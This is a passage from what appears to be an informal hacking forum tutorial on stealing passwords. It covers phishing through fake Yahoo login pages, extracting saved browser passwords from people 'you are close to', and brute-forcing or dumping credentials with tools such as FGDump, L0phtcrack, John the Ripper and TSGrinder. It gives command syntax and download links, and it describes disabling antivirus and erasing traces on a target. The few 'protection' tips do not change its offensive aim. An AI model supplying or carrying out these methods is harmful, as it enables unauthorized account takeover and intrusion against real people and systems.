It's hard to spot; after you make a page with this you have to send the link to someone and he has to sign in from there.
PROTECTION: Don't sign in to yahoo from pages like "www.infernal.isking.com/login.yahoo/script". This is probably a fake login.
Try to open one of these pages and check out the source code; you can determine what it will do from there.

Method 4
------PASSWARE OR PASSWORD SENDER------
This is for you people that want all passwords that were entered in Internet Explorer on your computer.
You download the Passware recovery kit and it will give you all of the passwords on your computer; you can use this for people you are close to lol.
PROTECTION: Be a paranoid son of a bitch: scan your computer, check installed programs, never let other people fuck with it and of course never enter your passwords on another person's computer.

Okay, this was for all new ones. Hope most of them get these methods and will be able to use them.
good luck

something about BRUTE FORCE attack

BRUTE-FORCE

1. Crack an FTP Password: NETWOX/NETWAG
The NETWOX application can be a very dangerous tool in the wrong hands. The latest version has 197 different techniques to enumerate information from the local area network (LAN) or launch attacks against a remote target. In this I just explain its ability to brute-force an FTP server given a username and password list.
SOURCE TO GET SOFTWARE:www.laurentconstantin.com/en/netw/netwox
PROCEDURE:Compile all components, run the NETWOX application, and review the results.


2. Extract Password Hashes: FGDump
The FGDump application was written to obtain the password hashes from the security Accounts manager(SAM) file on the target computer. This process includes:
1. Binding to a machine using the Inter-Process Communication(IPC$) or lists of targets.
2. Stopping the running of Anti-virus programs.
3. Locating writable file shares.
4. Uploading fgexec (for remote command execution) and cachedump.
5. Executing pwdump.
6. Executing cachedump.
7. Deleting uploaded files from the file share.
8. Unbinding from the file share.
9. Restarting any Anti-virus programs.
10. Unbinding from IPC$.
LINK TO GET SOFTWARE: [content suppressed]
PROCEDURE: Select the target and execute with the following syntax:
fgdump (-h host| -f filename) -u username -p password
As a example;
fgdump -vv -h IP address -u administrator -p 123

1. Here -vv means very verbose mode.
2. -h IP address identifies the target.
3. -u administrator identifies the username to use.
4. -p 123 is the password for the administrator account.
According to the results of this example,it tells:
sharing of any drive
any mapped drive bounded with ADMIN$ and is writeable or not.
any antivirus running or not.
The Passwords were successfully dumped from the target and all the traces of the attack were removed from the target.
From the directory on the attacker's machine, two new files were created:
1. ip address cachedump
2. ip address pwdump
Of above two, the IP address.pwdump is the file of interest. By opening the ip address.pwdump file with a text editor such as Notepad the password hashes from the target are visible.
You can get more options by the following syntax:
fgdump -h/-?

3. Crack and Capture Password hashes: LC5
L0phtcrack version 5 (LC5) is a password-auditing tool that allows for the capturing of Windows passwords and/or the conversion of captured Windows password hashes into the correct password. This is done by running candidate passwords through the hashing algorithm until the new hash exactly matches the captured one. This identifies the password that computes into the hash.
LINK TO GET SOFTWARE: [content suppressed]
PROCEDURE:Install the L0phtcrack application,start, select parameters, and execute.
Simple to use and very good software. You need a password dump file too, which is created by fgdump.

4.Change the Administrator Password: CHNTPW
The change NT password(CHNTPW) application will change the administrator password regardless of what it is currently set to. CHNTPW also demonstrates the need for strong access controls and physical access to servers or any computer.
LINK TO GET SOFTWARE:home.eunet.no/~pnordahl/ntpasswd/
PROCEDURE: Gain physical access to the computer,boot from the CHNTPW CD, follow the on-screen instructions, change the password(s), and reboot.

5.BRUTE-FORCE Passwords for a hashed file: JOHN THE Ripper
JOHN THE RIPPER has been around seemingly forever. Its ability to brute-force passwords has a proven track record. It is flexible, fast, and efficient, which are all quality items to look for when cracking passwords.
LINK TO GET SOFTWARE:www.openwall.com/john/
PROCEDURE: Configure, make and execute with appropriate options against a file containing hashed passwords with the following syntax:
john (password file)

6.BRUTE-FORCE an FTP Password Connection: BRUTEFTP
File Transfer Protocol is used to transfer files between computers and is still widely in use. The biggest flaw with FTP is that it is unencrypted in nature and, if intercepted, can be read easily, including the usernames, passwords, and data.
PROCEDURE: Install the application, select the target and execute.

7.BRUTE-FORCE terminal server passwords:TSGrinder II
TSGrinder II is an application designed to brute-force a username's password against a Terminal Server. Terminal Server uses an encrypted channel, which also helps evade Intrusion Detection Systems. Although a dictionary-based tool, it supports multiple attack windows from the same dictionary file.
LINK TO GET SOFTWARE:www.hammerofgod.com/download.htm
PROCEDURE: Start the application with selected options under the following syntax:
tsgrinder -u (username) -w (dictionary file) target
as a example:
tsgrinder -u kermit -p dict IP address